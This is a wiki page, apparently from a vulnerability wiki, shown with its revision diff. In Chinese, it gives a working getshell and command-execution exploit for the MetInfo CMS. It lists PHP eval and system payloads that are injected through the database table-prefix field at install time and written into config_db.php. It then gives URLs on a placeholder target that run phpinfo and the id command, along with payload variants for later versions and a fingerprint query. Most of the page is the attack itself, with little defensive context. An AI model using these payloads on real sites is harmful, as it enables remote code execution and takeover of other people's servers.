Difference between revisions of "米拓建站系統 getshell&命令執行漏洞"

Latest revision as of 11:06, 2 July 2021

Other languages:

body="MetInfo"

7.3.0- 7.0.0

在安裝該CMS - 【設置數據庫信息(數據表前綴)】：

代碼執行Payload：

"/@eval($_GET['1']);/

命令執行payload：

"/@system($_GET['1']);/

點擊保存進行下一步驗證，出現報錯信息

(這裏的Payload是代碼執行)

訪問以下url：

http://<target>/config/config_db.php?1=phpinfo();

可以看到成功執行了phpinfo

(這裏的Payload是命令執行)

訪問以下URL：

http://<target>/config/config_db.php?1=id();

成功執行id命令。

Version 7.10 
Payload："/@eval($_GET['1']);@system($_GET['2']);/

Version 7.20
Payload: "/@eval($_GET['1']);@system($_GET['2']);/

@@ Line 6: / Line 6: @@
 <translate>
-==影響版本==
+==影響版本== <!--T:1-->
 </translate>
 .3.0- 7.0.0
 <translate>
-==漏洞利用==
+==漏洞利用== <!--T:2-->
 </translate>
 <translate>
+<!--T:3-->
 在安裝該CMS - 【設置數據庫信息(數據表前綴)】：
 </translate>
@@ Line 20: / Line 21: @@
 <translate>
+<!--T:4-->
 代碼執行Payload：
 </translate>
@@ Line 28: / Line 30: @@
 <translate>
+<!--T:5-->
 命令執行payload：
 </translate>
@@ Line 35: / Line 38: @@
 <translate>
+<!--T:6-->
 點擊保存進行下一步驗證，出現報錯信息
 </translate>
@@ Line 40: / Line 44: @@
 <translate>
+<!--T:7-->
 (這裏的Payload是代碼執行)
+<!--T:8-->
 訪問以下url：
 </translate>
@@ Line 49: / Line 55: @@
 <translate>
+<!--T:9-->
 可以看到成功執行了phpinfo
 </translate>
@@ Line 54: / Line 61: @@
 <translate>
+<!--T:10-->
 (這裏的Payload是命令執行)
+<!--T:11-->
 訪問以下URL：
 </translate>
@@ Line 63: / Line 72: @@
 <translate>
+<!--T:12-->
 成功執行id命令。
 </translate>
@@ Line 68: / Line 78: @@
 <translate>
-==其他==
+==其他== <!--T:13-->
 </translate>
 <pre>